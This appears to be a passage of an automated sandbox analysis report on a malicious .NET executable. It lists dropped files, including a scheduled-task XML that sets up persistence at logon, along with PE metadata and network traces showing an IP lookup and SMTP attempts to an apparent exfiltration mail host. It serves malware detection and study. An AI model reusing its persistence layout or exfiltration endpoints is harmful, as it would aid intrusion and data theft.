                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5q24lbkz.fhg.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bpe35po2.15g.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cyyv2pco.udk.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gnwgj1tt.r4g.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j4quf2hi.t0l.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mzmfehjk.g0i.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rxay05sy.ws5.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\tmp1EF1.tmp

                                                            Download File
                                                            Process:C:\Users\user\AppData\Roaming\BLpvFR.exe
                                                            File Type:XML 1.0 document, ASCII text
                                                            Category:dropped
                                                            Size (bytes):1579
                                                            Entropy (8bit):5.107462687472562
                                                            Encrypted:false
                                                            SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtJxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuT/v
                                                            MD5:4776E633ED1558D935A431CF221DA377
                                                            SHA1:6004B44564871062B18F8A2B171383EF34BDE117
                                                            SHA-256:DBE5EE30D1C9C321E8F9C77DA5BE8A5999E199B3473020364E6DC868F87A1AD2
                                                            SHA-512:BEB87E7BD593B69E700F7DC12275F77A6F39E0ADE442AFB55E73012C7150B1BF46110D20995E18EE2A36020CBFC517A134C50EDCFFAA75766ABCAABD8B1781EF
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                                            C:\Users\user\AppData\Local\Temp\tmp89B.tmp

                                                            Download File
                                                            Process:C:\Users\user\Desktop\jKqPSehspS.exe
                                                            File Type:XML 1.0 document, ASCII text
                                                            Category:dropped
                                                            Size (bytes):1579
                                                            Entropy (8bit):5.107462687472562
                                                            Encrypted:false
                                                            SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtJxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuT/v
                                                            MD5:4776E633ED1558D935A431CF221DA377
                                                            SHA1:6004B44564871062B18F8A2B171383EF34BDE117
                                                            SHA-256:DBE5EE30D1C9C321E8F9C77DA5BE8A5999E199B3473020364E6DC868F87A1AD2
                                                            SHA-512:BEB87E7BD593B69E700F7DC12275F77A6F39E0ADE442AFB55E73012C7150B1BF46110D20995E18EE2A36020CBFC517A134C50EDCFFAA75766ABCAABD8B1781EF
                                                            Malicious:true
                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                                            C:\Users\user\AppData\Roaming\BLpvFR.exe

                                                            Download File
                                                            Process:C:\Users\user\Desktop\jKqPSehspS.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):927744
                                                            Entropy (8bit):7.32819754870697
                                                            Encrypted:false
                                                            SSDEEP:12288:cIR4R52J+XtwK0LgcOE7V8oL+SuEQD+Dr/POop6hvbJ30zWA0ylgrdm4Vz0Rppp5:cIeetgclptRK+v/tYlb5FA0y
                                                            MD5:3B1B99F3617BBE21D2BD1601E6CE73EE
                                                            SHA1:0BA6E0FE3C8F5A0511694421D841C377C1A4DAE5
                                                            SHA-256:23A0EED35D69811A38633D41868A1FD6A20FAF3912BDE628EB556124FD6E5447
                                                            SHA-512:6EECD51EEA9933FAA504959F456707C0C132DBD2598B64830A94232A3A733550EFADD03FF5F52C89C658BC016AEE3328D429B2382D0B63559E49535CB4FDE14B
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 91%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...piNg..............0.................. ........@.. ....................................@.................................0...O...........................`....................................................... ............... ..H............text........ ...................... ..`.rsrc..............................@..@.reloc.......`.......$..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Roaming\BLpvFR.exe:Zone.Identifier

                                                            Download File
                                                            Process:C:\Users\user\Desktop\jKqPSehspS.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.32819754870697
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            File name:jKqPSehspS.exe
                                                            File size:927'744 bytes
                                                            MD5:3b1b99f3617bbe21d2bd1601e6ce73ee
                                                            SHA1:0ba6e0fe3c8f5a0511694421d841c377c1a4dae5
                                                            SHA256:23a0eed35d69811a38633d41868a1fd6a20faf3912bde628eb556124fd6e5447
                                                            SHA512:6eecd51eea9933faa504959f456707c0c132dbd2598b64830a94232a3a733550efadd03ff5f52c89c658bc016aee3328d429b2382d0b63559e49535cb4fde14b
                                                            SSDEEP:12288:cIR4R52J+XtwK0LgcOE7V8oL+SuEQD+Dr/POop6hvbJ30zWA0ylgrdm4Vz0Rppp5:cIeetgclptRK+v/tYlb5FA0y
                                                            TLSH:2115F18AA900E522DE586B342F33D93917356DADBD30D12E6AEC7D9B3FBBDD21414012
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...piNg..............0.................. ........@.. ....................................@................................

                                                            File Icon

                                                            Icon Hash:c5949296969e8473

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x4aba82
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x674E6970 [Tue Dec 3 02:14:08 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xaba300x4f.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xac0000x380d0.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xe60000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000xa9a880xa9c00e81e99576977fa7cda0364fd60a2c546False0.934967265740059data7.794593073066602IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc0xac0000x380d00x38400776efce66aef4203e073a89f574e744fFalse0.3072916666666667data5.218306193316651IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0xe60000xc0x4004ef96ebdaed6b531509751ef26b10fd4False0.025390625data0.05585530805374581IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_ICON0xac4900x668Device independent bitmap graphic, 48 x 96 x 4, image size 11520.38353658536585367
                                                            RT_ICON0xacaf80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 5120.48655913978494625
                                                            RT_ICON0xacde00x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 2880.5286885245901639
                                                            RT_ICON0xacfc80x128Device independent bitmap graphic, 16 x 32 x 4, image size 1280.5878378378378378
                                                            RT_ICON0xad0f00x6739PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9933017975402081
                                                            RT_ICON0xb382c0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.5578358208955224
                                                            RT_ICON0xb46d40x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.6367328519855595
                                                            RT_ICON0xb4f7c0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors0.6497695852534562
                                                            RT_ICON0xb56440x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.47760115606936415
                                                            RT_ICON0xb5bac0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.125
                                                            RT_ICON0xc63d40x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 380160.21113622030691612
                                                            RT_ICON0xcf87c0x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 265600.21157894736842106
                                                            RT_ICON0xd60640x5488Device independent bitmap graphic, 72 x 144 x 32, image size 216000.24269870609981517
                                                            RT_ICON0xdb4ec0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 168960.22325224374114314
                                                            RT_ICON0xdf7140x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.3196058091286307
                                                            RT_ICON0xe1cbc0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.3642120075046904
                                                            RT_ICON0xe2d640x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.5086065573770492
                                                            RT_ICON0xe36ec0x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.5735815602836879
                                                            RT_GROUP_ICON0xe3b540x102data0.5697674418604651
                                                            RT_GROUP_ICON0xe3c580x14data1.05
                                                            RT_VERSION0xe3c6c0x278data0.46677215189873417
                                                            RT_MANIFEST0xe3ee40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                            Imports

                                                            DLLImport
                                                            mscoree.dll_CorExeMain

                                                            Network Behavior

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jan 11, 2025 04:25:26.620136976 CET49707443192.168.2.8104.26.12.205
                                                            Jan 11, 2025 04:25:26.620235920 CET44349707104.26.12.205192.168.2.8
                                                            Jan 11, 2025 04:25:26.620312929 CET49707443192.168.2.8104.26.12.205
                                                            Jan 11, 2025 04:25:26.642748117 CET49707443192.168.2.8104.26.12.205
                                                            Jan 11, 2025 04:25:26.642770052 CET44349707104.26.12.205192.168.2.8
                                                            Jan 11, 2025 04:25:27.111505032 CET44349707104.26.12.205192.168.2.8
                                                            Jan 11, 2025 04:25:27.111586094 CET49707443192.168.2.8104.26.12.205
                                                            Jan 11, 2025 04:25:27.115370035 CET49707443192.168.2.8104.26.12.205
                                                            Jan 11, 2025 04:25:27.115386009 CET44349707104.26.12.205192.168.2.8
                                                            Jan 11, 2025 04:25:27.115691900 CET44349707104.26.12.205192.168.2.8
                                                            Jan 11, 2025 04:25:27.193636894 CET49707443192.168.2.8104.26.12.205
                                                            Jan 11, 2025 04:25:27.240631104 CET49707443192.168.2.8104.26.12.205
                                                            Jan 11, 2025 04:25:27.283330917 CET44349707104.26.12.205192.168.2.8
                                                            Jan 11, 2025 04:25:27.347625017 CET44349707104.26.12.205192.168.2.8
                                                            Jan 11, 2025 04:25:27.347701073 CET44349707104.26.12.205192.168.2.8
                                                            Jan 11, 2025 04:25:27.347748995 CET49707443192.168.2.8104.26.12.205
                                                            Jan 11, 2025 04:25:27.629781008 CET49707443192.168.2.8104.26.12.205
                                                            Jan 11, 2025 04:25:28.779103041 CET4970825192.168.2.846.175.148.58
                                                            Jan 11, 2025 04:25:29.959255934 CET4970825192.168.2.846.175.148.58
                                                            Jan 11, 2025 04:25:30.968983889 CET49711443192.168.2.8104.26.12.205
                                                            Jan 11, 2025 04:25:30.969011068 CET44349711104.26.12.205192.168.2.8
                                                            Jan 11, 2025 04:25:30.969116926 CET49711443192.168.2.8104.26.12.205
                                                            Jan 11, 2025 04:25:30.972404957 CET49711443192.168.2.8104.26.12.205
                                                            Jan 11, 2025 04:25:30.972417116 CET44349711104.26.12.205192.168.2.8
                                                            Jan 11, 2025 04:25:31.431262016 CET44349711104.26.12.205192.168.2.8
                                                            Jan 11, 2025 04:25:31.431387901 CET49711443192.168.2.8104.26.12.205
                                                            Jan 11, 2025 04:25:31.477803946 CET49711443192.168.2.8104.26.12.205
                                                            Jan 11, 2025 04:25:31.477847099 CET44349711104.26.12.205192.168.2.8
                                                            Jan 11, 2025 04:25:31.478835106 CET44349711104.26.12.205192.168.2.8
                                                            Jan 11, 2025 04:25:31.678024054 CET49711443192.168.2.8104.26.12.205
                                                            Jan 11, 2025 04:25:31.842962027 CET49711443192.168.2.8104.26.12.205
                                                            Jan 11, 2025 04:25:31.887341976 CET44349711104.26.12.205192.168.2.8
                                                            Jan 11, 2025 04:25:31.952404976 CET44349711104.26.12.205192.168.2.8
                                                            Jan 11, 2025 04:25:31.952572107 CET44349711104.26.12.205192.168.2.8
                                                            Jan 11, 2025 04:25:31.956547976 CET49711443192.168.2.8104.26.12.205
                                                            Jan 11, 2025 04:25:31.958720922 CET49711443192.168.2.8104.26.12.205
                                                            Jan 11, 2025 04:25:31.959301949 CET4970825192.168.2.846.175.148.58
                                                            Jan 11, 2025 04:25:32.533010006 CET4971225192.168.2.846.175.148.58
                                                            Jan 11, 2025 04:25:33.553009033 CET4971225192.168.2.846.175.148.58
                                                            Jan 11, 2025 04:25:35.568656921 CET4971225192.168.2.846.175.148.58
                                                            Jan 11, 2025 04:25:35.959299088 CET4970825192.168.2.846.175.148.58
                                                            Jan 11, 2025 04:25:39.584281921 CET4971225192.168.2.846.175.148.58
                                                            Jan 11, 2025 04:25:43.959420919 CET4970825192.168.2.846.175.148.58
                                                            Jan 11, 2025 04:25:47.599929094 CET4971225192.168.2.846.175.148.58
                                                            Jan 11, 2025 04:25:51.701687098 CET5957653192.168.2.8162.159.36.2
                                                            Jan 11, 2025 04:25:51.706733942 CET5359576162.159.36.2192.168.2.8
                                                            Jan 11, 2025 04:25:51.708628893 CET5957653192.168.2.8162.159.36.2
                                                            Jan 11, 2025 04:25:51.713463068 CET5359576162.159.36.2192.168.2.8
                                                            Jan 11, 2025 04:25:52.183406115 CET5957653192.168.2.8162.159.36.2
                                                            Jan 11, 2025 04:25:52.188549042 CET5359576162.159.36.2192.168.2.8
                                                            Jan 11, 2025 04:25:52.188616991 CET5957653192.168.2.8162.159.36.2

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jan 11, 2025 04:25:26.564809084 CET6161253192.168.2.81.1.1.1
                                                            Jan 11, 2025 04:25:26.571656942 CET53616121.1.1.1192.168.2.8
                                                            Jan 11, 2025 04:25:28.759499073 CET5579453192.168.2.81.1.1.1
                                                            Jan 11, 2025 04:25:28.770808935 CET53557941.1.1.1192.168.2.8
                                                            Jan 11, 2025 04:25:51.701028109 CET5364194162.159.36.2192.168.2.8
                                                            Jan 11, 2025 04:25:52.219733953 CET5726953192.168.2.81.1.1.1
                                                            Jan 11, 2025 04:25:52.226701975 CET53572691.1.1.1192.168.2.8

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Jan 11, 2025 04:25:26.564809084 CET192.168.2.81.1.1.10xaf51Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                            Jan 11, 2025 04:25:28.759499073 CET192.168.2.81.1.1.10x4483Standard query (0)mail.iaa-airferight.comA (IP address)IN (0x0001)false
                                                            Jan 11, 2025 04:25:52.219733953 CET192.168.2.81.1.1.10xbb98Standard query (0)206.23.85.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Jan 11, 2025 04:25:26.571656942 CET1.1.1.1192.168.2.80xaf51No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
